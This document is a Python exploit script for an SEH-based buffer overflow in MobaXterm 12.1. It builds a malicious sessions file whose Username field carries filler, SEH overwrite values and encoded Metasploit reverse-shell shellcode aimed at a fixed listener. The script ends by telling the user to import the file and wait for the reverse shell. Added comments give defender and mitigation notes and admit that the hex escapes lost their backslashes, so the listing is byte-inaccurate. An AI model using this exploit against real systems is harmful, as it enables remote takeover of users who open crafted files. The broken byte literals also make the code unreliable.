# Title: Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)
# Author: Xavi Beltran
# Date: 2019-08-31
# Vendor: xavibel.com
# Vendor Page: https://mobaxterm.mobatek.net/download.html
# Author: Xavi Beltran
# Date: 2019-08-31
# Vendor: xavibel.com
# Vendor Page: https://mobaxterm.mobatek.net/download.html
# Software Link: https://download.mobatek.net/1112019010310554/MobaXterm_Portable_v11.1.zip
# Exploit Development process: https://xavibel.com/2019/09/01/mobaxterm-buffer-overflow-malicious-sessions-file-import/

# Description:
# SEH based Buffer Overflow in the Username field of a valid session
# This exploit generates a malicious MobaXterm sessions file
# When the user double-clicks on the session, the shellcode is executed
# You need to adapt the exploit to your current OS Windows version

#!/usr/bin/env python

# This is not the IP address of the reverse shell
# To be able to exploit the BOF you need to have a real machine with an open port that the target machine can reach

# Host/port fields written into the crafted session entry. Both are kept as
# strings because they are spliced verbatim into a text file, never parsed here.
ip_address: str = "192.168.1.88"
port: str = "22"

# We are going to recreate a MobaXterm sessions file export.
# The file is plain text: the section header, two fixed keys, and one session
# line ("pwnd=...") whose fields are separated by '%' and '#'. The overflowing
# Username field is appended further down (see `sessions_file += crash`).
print ("[+] Creating the malicious MobaXterm file...")
sessions_file: str = ""
sessions_file += "[Bookmarks] "
sessions_file += "SubRep= "
sessions_file += "ImgNum=42 "
# NOTE(review): the meaning of the "#109#0" prefix is not established by this
# script; it is reproduced from the author's exported session as-is.
sessions_file += "pwnd=#109#0%" + ip_address + "%" + port + "%"

# Here is the SEH Based Buffer Overflow part

# [*] Exact match at offset 16672 (author's pattern-match result)
# We have to subtract 4 that corresponds to NSEH, so the filler stops exactly
# where the next-SEH pointer begins.
# Defender note: a Username field of ~16 KB of one repeated character is a
# trivial content-inspection signal for an imported .mxtsessions file.
junk1: str = "A" * 16668

# NOTE(review): throughout this listing the hex escapes appear to have lost
# their backslashes (e.g. "x4C" rather than a single byte). As printed, these
# literals are multi-character ASCII text, so the file this script emits does
# not match the byte layout the comments describe. Treat the listing as
# illustrative of the technique, not as a byte-accurate artifact.

# Here we need to jump forward but EB is a bad char
# We decrease ESP and use a conditional jump after
# I have learned this trick in OSCE. Thank you Muts
nseh: str = ""
nseh += "x4C" # DEC ESP
nseh += "x4C" # DEC ESP
nseh += "x77x21" # JA SHORT 1035FE59

# Using a XP-SP1 so modules are compiled without SafeSEH
# !mona seh -cp asciiprint
# 0x762C5042 POP-POP-RET crypt32.dll
# Mitigation note: the handler address is hard-coded and depends on crypt32.dll
# being loaded at a fixed base without SafeSEH. SafeSEH-compiled modules, ASLR
# and DEP on current Windows builds each break this step on their own.
seh: str = "x42x50x2Cx76"

# Some padding that we are going to jump over it
junk2: str = "x42" * 29

# We recover the initial state of the stack (undo the two DEC ESP above)
alignment: str = ""
alignment += "x44" # INC ESP
alignment += "x44" # INC ESP


# And we reach our shellcode
# A0 is a badchar but the generated encoded shellcode won't use it
# /usr/share/framework2/msfpayload win32_reverse LHOST=192.168.1.88 LPORT=443 R > reverse_tcp
# /usr/share/framework2/msfencode -e Alpha2 -i reverse_tcp -t perl > encoded_rev_shell
# Shellcode 636 bytes
# Detection note: per the generator command above this is a reverse-TCP
# payload, so the network-side indicator is MobaXterm.exe itself opening an
# outbound connection to the LHOST/LPORT baked into the payload — a connection
# the application has no reason to make on a session double-click.
shellcode: str = ""
shellcode += "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x48x49x49"
shellcode += "x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax63"
shellcode += "x58x30x42x31x50x42x41x6bx41x41x73x41x32x41x41x32"
shellcode += "x42x41x30x42x41x58x50x38x41x42x75x4bx59x6bx4cx71"
shellcode += "x7ax5ax4bx30x4dx79x78x4cx39x4bx4fx79x6fx6bx4fx33"
shellcode += "x50x6cx4bx62x4cx56x44x77x54x6ex6bx50x45x55x6cx6e"
shellcode += "x6bx51x6cx55x55x54x38x57x71x5ax4fx4ex6bx52x6fx37"
shellcode += "x68x6ex6bx53x6fx51x30x36x61x38x6bx70x49x4ex6bx70"
shellcode += "x34x6ex6bx65x51x58x6ex47x41x6fx30x6cx59x4ex4cx4e"
shellcode += "x64x6fx30x53x44x36x67x5ax61x39x5ax64x4dx53x31x49"
shellcode += "x52x4ax4bx6bx44x67x4bx33x64x66x44x34x68x41x65x6b"
shellcode += "x55x4ex6bx73x6fx54x64x65x51x58x6bx73x56x6ex6bx54"
shellcode += "x4cx70x4bx6ex6bx31x4fx77x6cx33x31x48x6bx47x73x46"
shellcode += "x4cx6cx4bx6ex69x70x6cx55x74x37x6cx73x51x6fx33x35"
shellcode += "x61x4bx6bx62x44x4ex6bx57x33x36x50x6ex6bx41x50x76"
shellcode += "x6cx6cx4bx34x30x67x6cx4cx6dx4cx4bx33x70x43x38x61"
shellcode += "x4ex32x48x6cx4ex62x6ex34x4ex4ax4cx56x30x79x6fx58"
shellcode += "x56x62x46x51x43x52x46x70x68x44x73x45x62x75x38x42"
shellcode += "x57x32x53x75x62x31x4fx50x54x4bx4fx78x50x72x48x68"
shellcode += "x4bx5ax4dx6bx4cx45x6bx70x50x39x6fx6bx66x43x6fx6e"
shellcode += "x69x48x65x41x76x4fx71x48x6dx76x68x45x52x53x65x50"
shellcode += "x6ax33x32x4bx4fx6ex30x31x78x4bx69x73x39x6cx35x6e"
shellcode += "x4dx43x67x6bx4fx6ex36x50x53x41x43x46x33x51x43x30"
shellcode += "x43x36x33x57x33x42x73x49x6fx7ax70x70x68x49x50x6d"
shellcode += "x78x46x61x33x68x35x36x73x58x43x31x6dx6bx62x46x56"
shellcode += "x33x4ex69x69x71x5ax35x51x78x7ax4cx4cx39x4ex4ax31"
shellcode += "x70x36x37x49x6fx59x46x50x6ax52x30x70x51x31x45x6b"
shellcode += "x4fx5ax70x71x76x72x4ax62x44x53x56x73x58x42x43x50"
shellcode += "x6dx41x7ax32x70x42x79x51x39x38x4cx4cx49x69x77x71"
shellcode += "x7ax41x54x4cx49x6ax42x70x31x4bx70x4bx43x6fx5ax4d"
shellcode += "x45x4ex69x69x6dx39x6ex30x42x46x4dx59x6ex53x72x74"
shellcode += "x6cx4cx4dx73x4ax70x38x4ex4bx4cx6bx4ex4bx31x78x71"
shellcode += "x62x6bx4ex4ex53x76x76x79x6fx62x55x76x48x59x6fx4e"
shellcode += "x36x53x6bx70x57x71x42x53x61x66x31x32x71x72x4ax34"
shellcode += "x41x56x31x73x61x70x55x53x61x59x6fx7ax70x32x48x6c"
shellcode += "x6dx38x59x73x35x58x4ex41x43x49x6fx6ax76x43x5ax69"
shellcode += "x6fx6bx4fx30x37x59x6fx5ax70x73x58x6bx57x42x59x78"
shellcode += "x46x70x79x49x6fx73x45x64x44x59x6fx7ax76x69x6fx43"
shellcode += "x47x39x6cx39x6fx6ex30x45x38x6ax50x4fx7ax46x64x61"
shellcode += "x4fx72x73x6bx4fx58x56x39x6fx78x50x63"

# Full Username field, in stack order: filler, next-SEH record, handler
# address, jumped-over padding, ESP realignment, payload.
crash: str = junk1 + nseh + seh + junk2 + alignment + shellcode

# We need to maintain the MobaXterm sessions file structure: the remaining
# '%'-separated fields are copied from a legitimate export so the importer
# still accepts the entry and the session shows up in the UI.
sessions_file += crash
sessions_file += "%%-1%-1%%%22%%0%0%0%%%-1%0%0%0%%1080%%0%0%1#MobaFont%10%0%0%0%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%<none>%%0#0# #-1"

# We generate the file.
# Written in text mode with the platform default encoding; the artifact is
# ordinary text with no macros or binary sections, so content inspection of
# .mxtsessions files before import is inexpensive.
f = open( 'pwnd.mxtsessions', 'w' )
f.write(sessions_file)
f.close()

print ("[+] pwnd.mxtsessions file created!")
print ("[+] Import the sessions in MobaXterm and wait for the reverse shell! :)")